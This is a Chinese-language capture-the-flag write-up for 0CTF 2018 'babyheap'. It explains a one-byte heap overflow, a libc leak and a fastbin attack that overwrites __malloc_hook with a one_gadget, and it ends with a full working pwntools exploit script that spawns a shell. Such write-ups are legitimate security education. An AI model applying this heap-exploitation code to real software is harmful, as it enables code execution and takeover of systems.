0CTF2018 babyheap

漏洞位置

主要在update处会有一字节溢出漏洞

update

利用思路

题目保护机制全开

checksec

申请不对齐0x10(0x_8)的堆,再利用one_byte_off可修改下一个堆块的size位。大体思路是利用fastbin attack,但由于是full relro,所以got表不可写,所以考虑用one_gadget覆盖malloc_hook第一步-leak libc_base:布置出叠在一起的两个堆,修改后一个堆块到unsor tbin的范围内free掉后再view前一个堆块可泄露出libc的基址。第二步-fastbin attack:由于在malloc_hook上方没有发现合适的size位用来伪造,所以准备直接把size当成堆的首地址,让其进入main_arena中的fastbinY中,然后再构造fastbin attack修改last reminder地址到malloc_hook上方,再次malloc时即可申请到malloc_hook并修改。

在做堆题时,由于会构造许多伪堆块,所以我们应该对每个真实的堆块、指针以及编号进行备注,这样会提高调试的效率,也不容易弄混淆。在进行关键步骤时,可每做完一次操作马上观察是否达到了预期的效果。

my-exp

from pwn import *
local = 1
one_gadget = [0x45216 , 0x4526a , 0xf02a4 , 0xf1147]
if local:
    p = process('./babyheap')
    libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
else:
    print 'time is up;'

def allocate(size):
    p.recv(1024)
    p.sendline('1')
    p.recvuntil('Size: ')
    p.sendline(str(size))

def update(index , size , content):
    p.recv(1024)
    p.sendline('2')
    p.recvuntil('Index: ')
    p.sendline(str(index))
    p.recvuntil('Size: ')
    p.sendline(str(size))
    p.recvuntil('Content: ')
    p.sendline(content)

def delete(index):
    p.recv(1024)
    p.sendline('3')
    p.recvuntil('Index: ')
    p.sendline(str(index))

def view(index):
    p.recv(1024)
    p.sendline('4')
    p.recvuntil('Index: ')
    p.sendline(str(index))
    return p.recvuntil('\n')[:-1]

def debug():
    print pidof(p)[0]
    raw_input()

#step1 leak libc_base
allocate(0x18)          #0  00
allocate(0x18)          #1  20
allocate(0x18)          #2  40
allocate(0x40)          #3  60
allocate(0x18)          #4  b0
allocate(0x58)          #5  d0
update(0 , 0x19 , 'a' * 0x18 + '\x41')
delete(1)
allocate(0x30)          #1  20
update(1 , 0x20 , '\x00' * 0x18 + '\x91' + '\x00' * 7)
delete(3)
delete(2)
aaa = view(1)
aaa = aaa.rstrip('\n')[-8:]
libc.address = u64(aaa) - 0x3c4b78
success('libc_base => ' + hex(libc.address))
dst_addr = libc.address + 0x3c4b40
success('dst_addr => ' + hex(dst_addr))
malloc_hook = libc.symbols['__malloc_hook']
success('malloc_hook => ' + hex(malloc_hook))

#step2 fastbin_attack to main_arena
allocate(0x58)          #2  40
update(2 , 0x20 , '\x00' * 0x18 + '\x51' + '\x00' * 7)
allocate(0x20)          #3  a0
update(3 , 0x10 , '\x00' * 0x8 + '\x21' + '\x00' * 7)
allocate(0x40)          #6  60
update(6 , 0x40 , '\x00' * 0x38 + '\x31' + '\x00' * 7)
update(3 , 0x20 , '\x00' * 0x18 + '\x21' + '\x00' * 7)
update(5 , 0x10 , '\x00' * 8 + '\x51' + '\x00' * 7)
update(2 , 0x20 , '\x00' * 0x18 + '\x61' + '\x00' * 7)
delete(6)
update(2 , 0x28 , '\x00' * 0x18 + '\x61' + '\x00' * 7 + '\x41' + '\x00' * 7)
allocate(0x50)          #6  60
allocate(0x30)          #7  130
update(2 , 0x59 , '\x00' * 0x18 + '\x41' + '\x00' * 0x3f + '\x41')
delete(3)
allocate(0x38)          #3  a0
update(3 , 0x29 , '\x00' * 0x28 + '\x41')
update(5 , 0x39 , '\x00' * 0x38 + '\x21')
delete(5)
update(3 , 0x38 , '\x00' * 0x28 + '\x41' + '\x00' * 7 + p64(dst_addr))
allocate(0x30)          #5  
allocate(0x30)          #8  

#step3 overwirte top_chunk_ptr above malloc_hook
update(8 , 0x30 , '\x00' * 0x28 + p64(malloc_hook - 0x10))

#step4 malloc a new chunk & overwrite malloc_hook to one_gadget
allocate(0x10)          #9  
update(9 , 0x8 , p64(libc.address + one_gadget[1]))

allocate(0x10)
#debug()
p.interactive()

推荐阅读更多精彩内容